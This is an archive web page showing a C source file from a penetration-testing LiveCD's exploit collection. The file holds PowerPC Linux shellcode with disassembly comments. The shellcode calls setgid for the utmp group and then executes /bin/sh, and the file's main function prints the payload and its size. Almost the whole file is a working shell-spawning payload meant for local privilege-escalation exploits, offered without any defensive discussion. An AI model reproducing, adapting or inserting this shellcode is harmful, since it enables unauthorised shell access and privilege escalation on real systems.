home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / execve.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.8 KB  |  59 lines
  1. /* execve.c
  2.  *
  3.  * PowerPC Linux Shellcode
  4.  *
  5.  * by Charles Stevenson <core@bokeoa.com>
  6.  *
  7.  * original execve by my good friend
  8.  * Kevin Finisterre  <dotslash@snosoft.com>
  9.  */
  10.  
  11. #include <stdio.h>
  12.  
  13. char shellcode[] =
  14. /* setgid(43) utmp */
  15.         "\x38\x60\x01\x37"              /* 100004a0: li
  16. r3,311             */
  17.         "\x38\x63\xfe\xf4"              /* 100004a4: addi
  18. r3,r3,-268         */
  19.         "\x3b\xc0\x01\x70"              /* 100004a8: li
  20. r30,368            */
  21.         "\x7f\xc0\x1e\x70"              /* 100004ac: srawi
  22. r0,r30,3           */
  23.         "\x44\xff\xff\x02"              /* 100004b0:
  24. sc                         */
  25. /* execve("/bin/sh") */
  26.         "\x7c\xa5\x2a\x78"              /* 100004b0: xor
  27. r5,r5,r5        */
  28.         "\x40\x82\xff\xed"              /* 100004b4: bnel+      100004a0
  29. <main> */
  30.         "\x7f\xe8\x02\xa6"              /* 100004b8: mflr
  31. r31             */
  32.         "\x3b\xff\x01\x30"              /* 100004bc: addi
  33. r31,r31,304     */
  34.         "\x38\x7f\xfe\xf4"              /* 100004c0: addi
  35. r3,r31,-268     */
  36.         "\x90\x61\xff\xf8"              /* 100004c4: stw
  37. r3,-8(r1)       */
  38.         "\x90\xa1\xff\xfc"              /* 100004c8: stw
  39. r5,-4(r1)       */
  40.         "\x38\x81\xff\xf8"              /* 100004cc: addi
  41. r4,r1,-8        */
  42.         "\x3b\xc0\x01\x60"              /* 100004d0: li
  43. r30,352         */
  44.         "\x7f\xc0\x2e\x70"              /* 100004d4: srawi
  45. r0,r30,5        */
  46.         "\x44\xff\xff\x02"              /* 100004d8:
  47. sc                         */
  48.         "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi
  49. cr6,r2,26990    */
  50.         "\x2f\x73\x68\x00";             /* 100004e0: cmpdi
  51. cr6,r19,26624   */
  52.  
  53. int main(int argc, char **argv) {
  54.    fprintf(stderr,"sizeof(shellcode)=%d\n",sizeof(shellcode));
  55.    //__asm__("b shellcode");
  56.    printf("%s",shellcode);
  57.    return 0;
  58. }
  59.